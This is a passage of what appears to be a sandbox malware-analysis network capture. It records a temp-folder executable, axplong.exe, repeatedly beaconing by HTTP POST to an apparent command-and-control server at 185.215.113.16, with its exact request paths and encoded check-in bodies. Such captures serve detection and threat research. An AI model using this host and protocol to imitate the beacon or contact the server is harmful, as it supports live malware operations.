                    Date: Thu, 26 Sep 2024 23:43:23 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    18 | 192.168.2.8 | 49728 | 185.215.113.16 | 80 | 7648 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 01:43:23.238768101 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:43:23.948216915 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:23 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:43:23.950522900 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 156
                    Cache-Control: no-cache
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Sep 27, 2024 01:43:24.180466890 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:24 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    19 | 192.168.2.8 | 49729 | 185.215.113.16 | 80 | 7648 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 01:43:24.303957939 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:43:25.049860954 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:24 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:43:25.051582098 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 156
                    Cache-Control: no-cache
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Sep 27, 2024 01:43:25.285926104 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:25 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    20 | 192.168.2.8 | 49730 | 185.215.113.16 | 80 | 7648 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 01:43:25.423085928 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:43:26.151310921 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:26 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:43:26.152304888 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 156
                    Cache-Control: no-cache
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Sep 27, 2024 01:43:26.388048887 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:26 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    21 | 192.168.2.8 | 49732 | 185.215.113.16 | 80 | 7648 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 01:43:26.504379034 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:43:27.223661900 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:27 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:43:27.224919081 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 156
                    Cache-Control: no-cache
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Sep 27, 2024 01:43:27.454963923 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:27 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    22 | 192.168.2.8 | 49734 | 185.215.113.16 | 80 | 7648 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 01:43:27.566574097 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:43:28.272741079 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:28 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:43:28.280612946 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 156
                    Cache-Control: no-cache
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Sep 27, 2024 01:43:28.505650997 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:28 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    23 | 192.168.2.8 | 49735 | 185.215.113.16 | 80 | 7648 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 01:43:28.678603888 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:43:29.337007046 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:29 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:43:29.338445902 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 156
                    Cache-Control: no-cache
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Sep 27, 2024 01:43:29.569871902 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:29 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    24 | 192.168.2.8 | 49736 | 185.215.113.16 | 80 | 7648 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 01:43:29.698048115 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:43:30.447463036 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:30 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:43:30.448374033 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 156
                    Cache-Control: no-cache
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Sep 27, 2024 01:43:30.687792063 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:30 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    25 | 192.168.2.8 | 49737 | 185.215.113.16 | 80 | 7648 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 01:43:30.801863909 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:43:31.491599083 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:31 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:43:31.588385105 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 156
                    Cache-Control: no-cache
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Sep 27, 2024 01:43:31.813420057 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:31 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    26 | 192.168.2.8 | 49738 | 185.215.113.16 | 80 | 7648 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 01:43:32.013638973 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:43:32.726602077 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:32 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:43:32.728928089 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 156
                    Cache-Control: no-cache
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Sep 27, 2024 01:43:32.958177090 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:32 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    27 | 192.168.2.8 | 49739 | 185.215.113.16 | 80 | 7648 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 01:43:33.068240881 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:43:33.761631966 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:33 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:43:33.762690067 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 156
                    Cache-Control: no-cache
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Sep 27, 2024 01:43:33.984903097 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:33 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    28 | 192.168.2.8 | 49740 | 185.215.113.16 | 80 | 7648 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 01:43:34.099169970 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:43:34.806998968 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:34 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:43:34.922063112 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 156
                    Cache-Control: no-cache
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Sep 27, 2024 01:43:35.148251057 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:35 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    29 | 192.168.2.8 | 49741 | 185.215.113.16 | 80 | 7648 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 01:43:35.269680023 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:43:36.005976915 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:35 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:43:36.006787062 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 156
                    Cache-Control: no-cache
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Sep 27, 2024 01:43:36.233390093 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:36 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    30 | 192.168.2.8 | 49742 | 185.215.113.16 | 80 | 7648 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 01:43:36.348828077 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:43:37.047596931 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:36 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:43:37.048603058 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 156
                    Cache-Control: no-cache
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Sep 27, 2024 01:43:37.275119066 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:37 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    31 | 192.168.2.8 | 49743 | 185.215.113.16 | 80 | 7648 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 01:43:37.464751959 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:43:38.176256895 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:38 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:43:38.177397966 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 156
                    Cache-Control: no-cache
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Sep 27, 2024 01:43:38.408268929 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:38 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    32 | 192.168.2.8 | 49744 | 185.215.113.16 | 80 | 7648 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 01:43:38.522445917 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:43:39.247031927 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:39 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:43:39.247909069 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 156
                    Cache-Control: no-cache
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Sep 27, 2024 01:43:39.483381987 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:39 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    33 | 192.168.2.8 | 49745 | 185.215.113.16 | 80 | 7648 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 01:43:39.598860025 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
